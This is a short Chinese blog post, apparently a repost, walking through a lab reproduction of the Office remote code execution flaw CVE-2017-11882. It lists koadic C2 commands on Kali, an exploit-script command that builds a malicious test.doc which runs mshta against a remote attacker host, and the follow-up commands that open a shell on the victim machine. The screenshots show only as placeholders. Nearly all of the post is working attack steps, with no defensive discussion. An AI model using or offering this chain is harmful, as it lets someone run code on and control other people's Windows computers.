码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2017-11882-Office远程代码执行漏洞复现

时间:2017-12-01 20:42:32      阅读:324      评论:0      收藏:0      [点我收藏+]

标签:master   环境   users   test   cmdshell   port   safe   Koa   alt   

实验环境:win10+kali

工具:koadic,Command43b_CVE-2017-11882.py

KALI:

root@kali:/opt/koadic-master# ./koadic

技术分享图片

(koadic: stager/js/mshta)# set lhost 10.73.28.148

(koadic: stager/js/mshta)# set lport 55555

(koadic: stager/js/mshta)# run

技术分享图片

 python C:\Users\esafenet\Desktop\Command43b_CVE-2017-11882.py -c "mshta http://10.73.28.148:55555/Vr745" -o test.doc

技术分享图片

win10上打开test.doc

技术分享图片

(koadic: stager/js/mshta)# zombies 0

(koadic: stager/js/mshta)# cmdshell 0

技术分享图片

 

CVE-2017-11882-Office远程代码执行漏洞复现

标签:master   环境   users   test   cmdshell   port   safe   Koa   alt   

原文地址:http://www.cnblogs.com/peterpan0707007/p/7944206.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!